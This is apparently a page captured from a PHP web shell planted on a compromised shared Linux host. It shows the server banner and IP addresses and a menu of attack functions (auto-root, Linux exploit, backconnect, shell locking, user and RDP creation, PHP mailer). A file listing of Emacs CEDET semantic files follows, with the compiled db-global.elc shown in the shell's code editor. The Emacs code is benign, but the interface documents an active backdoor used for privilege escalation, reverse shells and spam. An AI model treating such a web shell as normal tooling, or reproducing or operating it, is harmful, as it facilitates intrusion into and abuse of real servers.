Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
cedet /
semantic /
[ HOME SHELL ]
Name
Size
Permission
Action
analyze
[ DIR ]
drwxr-xr-x
bovine
[ DIR ]
drwxr-xr-x
decorate
[ DIR ]
drwxr-xr-x
symref
[ DIR ]
drwxr-xr-x
wisent
[ DIR ]
drwxr-xr-x
analyze.elc
28.54
KB
-rw-r--r--
bovine.elc
4.98
KB
-rw-r--r--
chart.elc
4.28
KB
-rw-r--r--
complete.elc
76.43
KB
-rw-r--r--
ctxt.elc
35.96
KB
-rw-r--r--
db-debug.elc
2.75
KB
-rw-r--r--
db-ebrowse.elc
19.95
KB
-rw-r--r--
db-el.elc
13.43
KB
-rw-r--r--
db-file.elc
14.32
KB
-rw-r--r--
db-find.elc
42.67
KB
-rw-r--r--
db-global.elc
9.38
KB
-rw-r--r--
db-javascript.elc
10.97
KB
-rw-r--r--
db-mode.elc
6.7
KB
-rw-r--r--
db-ref.elc
4.96
KB
-rw-r--r--
db-typecache.elc
18.33
KB
-rw-r--r--
db.elc
39.36
KB
-rw-r--r--
debug.elc
17.84
KB
-rw-r--r--
decorate.elc
8.29
KB
-rw-r--r--
dep.elc
7.5
KB
-rw-r--r--
doc.elc
4.14
KB
-rw-r--r--
ede-grammar.elc
9.58
KB
-rw-r--r--
edit.elc
21.04
KB
-rw-r--r--
find.elc
24.37
KB
-rw-r--r--
format.elc
34.91
KB
-rw-r--r--
fw.elc
12.36
KB
-rw-r--r--
grammar-wy.elc
53.64
KB
-rw-r--r--
grammar.elc
78.55
KB
-rw-r--r--
html.elc
7.16
KB
-rw-r--r--
ia-sb.elc
9.44
KB
-rw-r--r--
ia.elc
11.76
KB
-rw-r--r--
idle.elc
60.12
KB
-rw-r--r--
imenu.elc
12.07
KB
-rw-r--r--
java.elc
16.47
KB
-rw-r--r--
lex-spp.elc
34.13
KB
-rw-r--r--
lex.elc
77.22
KB
-rw-r--r--
loaddefs.el
58.17
KB
-rw-r--r--
mru-bookmark.elc
15.46
KB
-rw-r--r--
sb.elc
11.45
KB
-rw-r--r--
scope.elc
25
KB
-rw-r--r--
senator.elc
29.09
KB
-rw-r--r--
sort.elc
18.84
KB
-rw-r--r--
symref.elc
17.35
KB
-rw-r--r--
tag-file.elc
6.45
KB
-rw-r--r--
tag-ls.elc
24.72
KB
-rw-r--r--
tag-write.elc
3.77
KB
-rw-r--r--
tag.elc
54.36
KB
-rw-r--r--
texi.elc
16.99
KB
-rw-r--r--
util-modes.elc
44.17
KB
-rw-r--r--
util.elc
13.24
KB
-rw-r--r--
wisent.elc
7.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db-global.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\300\303!\207" [require cedet-global semantic/db-find semantic/symref/global] 2) #@576 Enable the use of the GNU Global SemanticDB back end for all files of MODE. This will add an instance of a GNU Global database to each buffer in a GNU Global supported hierarchy. Two sanity checks are performed to assure (a) that GNU global program exists and (b) that the GNU global program version is compatibility with the database version. If optional NOERROR is nil, then an error may be signaled on version mismatch. If NOERROR is not nil, then no error will be signaled. Instead return value will indicate success or failure with non-nil or nil respective values. (defalias 'semanticdb-enable-gnu-global-databases #[(mode &optional noerror) "\306!\205\206 ;\203 \307 ! \310\204 \311\312!\210\211\313\314!\315\204: \n\211\262\204: \262\f\2058 \316\f\"\262\203e \211\204e \304N\203T \316\304N\"\211\262\204: \211\317N\206^ \211\320N\262\262\202: \266\203\211\262\205y \211\203w N\205y J\266\205\321\322 \323BB!\210)\324\207" [noerror mode mode-local-active-mode major-mode mode-local-symbol-table semanticdb--ih cedet-gnu-global-version-check intern semantic-init-mode-hook error "Missing major mode symbol" mode-variable-flag symbol-name nil intern-soft mode-local-parent derived-mode-parent eval setq-mode-local (semantic-init-mode-hook (cons 'semanticdb-enable-gnu-global-hook semanticdb--ih)) t] 13 (#$ . 528) (list (completing-read "Enable in Mode: " obarray #'(lambda (s) (get s 'mode-local-symbol-table)) t (symbol-name major-mode)))]) #@111 Add support for GNU Global in the current buffer via `semantic-init-hook'. MODE is the major mode to support. (defalias 'semanticdb-enable-gnu-global-hook #[nil "\300\301!\207" [semanticdb-enable-gnu-global-in-buffer t] 2 (#$ . 2016)]) (byte-code "\300\301\302\303!\"\210\300\304\305\303!\"\210\300\306\304\"\210\307\306\310\311#\210\312\303\313\304#\314\303\315\316\317$\207" [defalias semanticdb-project-database-global-p eieio-make-class-predicate semanticdb-project-database-global semanticdb-project-database-global--eieio-childp eieio-make-child-predicate semanticdb-project-database-global-child-p make-obsolete "use (cl-typep ... \\='semanticdb-project-database-global) instead" "25.1" define-symbol-prop cl-deftype-satisfies eieio-defclass-internal (semanticdb-project-database eieio-instance-tracker) nil (:documentation "Database representing a GNU Global tags file.")] 6) #@73 Create a new object of class type `semanticdb-project-database-global'. (defalias 'semanticdb-project-database-global #[(&rest slots) "\301\302\303#\207" [slots apply make-instance semanticdb-project-database-global] 4 (#$ . 2906)]) (byte-code "\300\301\302\303#\300\207" [function-put semanticdb-project-database-global compiler-macro semanticdb-project-database-global--anon-cmacro] 4) (defalias 'semanticdb-project-database-global--anon-cmacro #[(whole &rest slots) "@;\204 \207\302\303\304@ @# @\305@DABB\"\207" [slots whole macroexp--warn-and-return format "Obsolete name arg %S to constructor %S" identity] 5]) #@195 Enable a GNU Global database in the current buffer. When GNU Global is not available for this directory, display a message if optional DONT-ERR-IF-NOT-AVAILABLE is non-nil; else throw an error. (defalias 'semanticdb-enable-gnu-global-in-buffer #[(&optional dont-err-if-not-available) "\304 \203 \305\306!B\307 \310\"\211\207\n?\205 \311\312\"\207" [semanticdb-project-system-databases semanticdb-find-default-throttle dont-err-if-not-available default-directory cedet-gnu-global-root make-instance semanticdb-project-database-global append (omniscience) error "No Global support in %s"] 3 (#$ . 3537) "P"]) (byte-code "\300\301\302\303!\"\210\300\304\305\303!\"\210\300\306\304\"\210\307\306\310\311#\210\312\303\313\304#\314\303\315\316\317$\207" [defalias semanticdb-table-global-p eieio-make-class-predicate semanticdb-table-global semanticdb-table-global--eieio-childp eieio-make-child-predicate semanticdb-table-global-child-p make-obsolete "use (cl-typep ... \\='semanticdb-table-global) instead" "25.1" define-symbol-prop cl-deftype-satisfies eieio-defclass-internal (semanticdb-search-results-table) ((major-mode :initform nil)) (:documentation "A table for returning search results from GNU Global.")] 6) #@62 Create a new object of class type `semanticdb-table-global'. (defalias 'semanticdb-table-global #[(&rest slots) "\301\302\303#\207" [slots apply make-instance semanticdb-table-global] 4 (#$ . 4763)]) (byte-code "\300\301\302\303#\300\207" [function-put semanticdb-table-global compiler-macro semanticdb-table-global--anon-cmacro] 4) (defalias 'semanticdb-table-global--anon-cmacro #[(whole &rest slots) "@;\204 \207\302\303\304@ @# @\305@DABB\"\207" [slots whole macroexp--warn-and-return format "Obsolete name arg %S to constructor %S" identity] 5]) (byte-code "\300\301\302\303\302\304%\210\300\305\302\306\302\307%\210\300\310\302\311\302\312%\210\300\313\302\314\315\316%\210\300\317\302\320\302\321%\210\300\322\302\323\315\324%\210\300\325\302\326\315\327%\210\300\330\302\331\315\332%\210\300\333\302\334\302\335%\210\300\336\302\337\302\340%\210\300\341\302\342\302\343%\210\344\345!\207" [cl-generic-define-method semanticdb-debug-info nil ((obj semanticdb-table-global)) #[(obj) "\300C\207" ["(proxy)"] 1] cl-print-object ((obj semanticdb-table-global) stream) #[(obj stream) "\302\303\304!\" \"\207" [obj stream princ eieio-object-name semanticdb-debug-info] 5 "Pretty printer extension for `semanticdb-table-global'.\nAdds the number of tags in this file to the object print name."] semanticdb-equivalent-mode ((table semanticdb-table-global) &optional buffer) #[(table &optional buffer) "\300\207" [t] 1 "Return t, pretend that this table's mode is equivalent to BUFFER.\nEquivalent modes are specified by the `semantic-equivalent-major-modes'\nlocal variable."] semanticdb-get-database-tables ((obj semanticdb-project-database-global)) t #[(#1=#:cl--cnm obj) "\303\304\"\204 \305\306!\307\304 C#\210\307 \310#\210\307 \311\312#\210)\n \207" [obj newtable #1# slot-boundp tables make-instance semanticdb-table-global eieio-oset parent-db tags nil] 4 "For a global database, there are no explicit tables.\nFor each file hit, get the traditional semantic table from that file."] semanticdb-file-table ((obj semanticdb-project-database-global) filename) #[(obj filename) "\301!@\207" [obj semanticdb-get-database-tables] 2 "From OBJ, return FILENAME's associated table object."] semanticdb-find-tags-by-name-method ((table semanticdb-table-global) name &optional tags) #[(#2=#:cl--cnm table name &optional tags) "\203 \207\305\306\307\"\211\205 \310\f!*\207" [tags #2# semantic-symref-tool name result global semantic-symref-find-tags-by-name project semantic-symref-result-get-tags] 4 "Find all tags named NAME in TABLE.\nReturn a list of tags."] semanticdb-find-tags-by-name-regexp-method ((table semanticdb-table-global) regex &optional tags) #[(#3=#:cl--cnm table regex &optional tags) "\203 \207\305\306\307\"\211\205 \310\f!*\207" [tags #3# semantic-symref-tool regex result global semantic-symref-find-tags-by-regexp project semantic-symref-result-get-tags] 4 "Find all tags with name matching REGEX in TABLE.\nOptional argument TAGS is a list of tags to search.\nReturn a list of tags."] semanticdb-find-tags-for-completion-method ((table semanticdb-table-global) prefix &optional tags) #[(#4=#:cl--cnm table prefix &optional tags) "\203 \207\306\307\310\"\311\f\205K \312\f\313\"\311\211\203I @\211\314\315\316D\211\317!\311\211\257+ BA\211\204! * +\207" [tags #4# semantic-symref-tool prefix result faketags global semantic-symref-find-tags-by-completion project nil eieio-oref hit-text function :faux t semantic-tag-make-plist T --dolist-tail-- attributes class name] 6 "In TABLE, find all occurrences of tags matching PREFIX.\nOptional argument TAGS is a list of tags to search.\nReturns a table of all matching tags."] semanticdb-deep-find-tags-by-name-method ((table semanticdb-table-global) name &optional tags) #[(table name &optional tags) "\303 \n#\207" [table name tags semanticdb-find-tags-by-name-method] 4 "Find all tags name NAME in TABLE.\nOptional argument TAGS is a list of tags to search.\nLike `semanticdb-find-tags-by-name-method' for global."] semanticdb-deep-find-tags-by-name-regexp-method ((table semanticdb-table-global) regex &optional tags) #[(table regex &optional tags) "\303 \n#\207" [table regex tags semanticdb-find-tags-by-name-regexp-method] 4 "Find all tags with name matching REGEX in TABLE.\nOptional argument TAGS is a list of tags to search.\nLike `semanticdb-find-tags-by-name-method' for global."] semanticdb-deep-find-tags-for-completion-method ((table semanticdb-table-global) prefix &optional tags) #[(table prefix &optional tags) "\303 \n#\207" [table prefix tags semanticdb-find-tags-for-completion-method] 4 "In TABLE, find all occurrences of tags matching PREFIX.\nOptional argument TAGS is a list of tags to search.\nLike `semanticdb-find-tags-for-completion-method' for global."] provide semantic/db-global] 6)
Close